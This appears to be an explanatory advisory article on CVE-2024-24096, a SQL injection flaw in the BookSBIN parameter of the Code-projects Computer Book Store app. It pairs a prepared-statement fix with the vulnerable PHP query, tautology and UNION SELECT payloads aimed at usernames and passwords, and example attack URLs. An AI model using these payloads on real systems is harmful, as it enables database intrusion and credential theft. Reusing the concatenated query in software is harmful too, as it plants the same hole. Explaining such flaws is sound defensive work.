CVE-2024-24096 - SQL Injection Vulnerability in Code-projects Computer Book Store 1. Explained

---

Overview

A recent security issue, CVE-2024-24096, was found in the "Code-projects Computer Book Store 1." application. This vulnerability lets attackers perform SQL Injection attacks using the BookSBIN parameter. In this article, we break down what that means, how it happens, and how attackers could exploit it. We’ll also show some useful code snippets and offer original reference links.

What Is Code-projects Computer Book Store 1.?

Code-projects Computer Book Store 1. is an open-source web application that lets users browse, search, and buy books. It’s used often in coding projects and small webshops as a learning resource.

What Is CVE-2024-24096?

CVE-2024-24096 is a security identifier given to a bug in this web store that can let a hacker run unauthorized commands on its database. This is called SQL Injection and is one of the most common—and dangerous—web security problems.

Where’s the Vulnerability?

The weakness lives in the way the web app handles book searches using the BookSBIN value—for example, when searching by book serial number.

Vulnerable PHP Code Snippet

// Vulnerable snippet:
$BookSBIN = $_GET['BookSBIN'];
$sql = "SELECT * FROM books WHERE BookSBIN='$BookSBIN'";
$result = mysqli_query($conn, $sql);

Here, $BookSBIN comes directly from the user (probably from a search box). The developer places it straight into the SQL query without any cleaning or checks.

If you enter 123456 in the book search, the web app processes

SELECT * FROM books WHERE BookSBIN='123456'

But if someone enters

123456' OR '1'='1

The query becomes

SELECT * FROM books WHERE BookSBIN='123456' OR '1'='1'

This '1'='1' always returns true—and the attacker gets the full list of books, or worse.

If the attacker finds user or admin tables, they could try

' UNION SELECT username, password, 1, 1 FROM users--

Now, the SQL joins the books table to the users table, leaking usernames and password hashes as book records.

`

http://example.com/book.php?BookSBIN=123456

`

http://example.com/book.php?BookSBIN=123456' OR '1'='1

`

http://example.com/book.php?BookSBIN=123456' UNION SELECT user(), database(), 1, 1--

Original References

- Exploit Database CVE-2024-24096 (Exploit-DB)
- NVD CVE-2024-24096 Details
- Code-projects Computer Book Store 1. Official Download

Secure Coding – Use Prepared Statements

Always use prepared statements to avoid SQL injection. Here’s how you could fix the original PHP code:

// Secure version USING prepared statements:
$BookSBIN = $_GET['BookSBIN'];
$stmt = $conn->prepare("SELECT * FROM books WHERE BookSBIN = ?");
$stmt->bind_param("s", $BookSBIN);
$stmt->execute();
$result = $stmt->get_result();

This way, even tricky input won’t change the intent of the SQL command.

Key Takeaways

- CVE-2024-24096 exposes sensitive data in Code-projects Computer Book Store 1. using SQL injection.

Use prepared statements to immediately patch this issue if you run the app.

If you use or code with Computer Book Store 1., update your scripts and audit your code for similar mistakes. SQL injection is dangerous but preventable with simple best practices.


> *If you want to learn more about secure PHP and safe database coding, check resources like OWASP SQL Injection Prevention Cheat Sheet.*

Timeline

Published on: 02/27/2024 02:15:06 UTC
Last modified on: 11/05/2024 20:35:20 UTC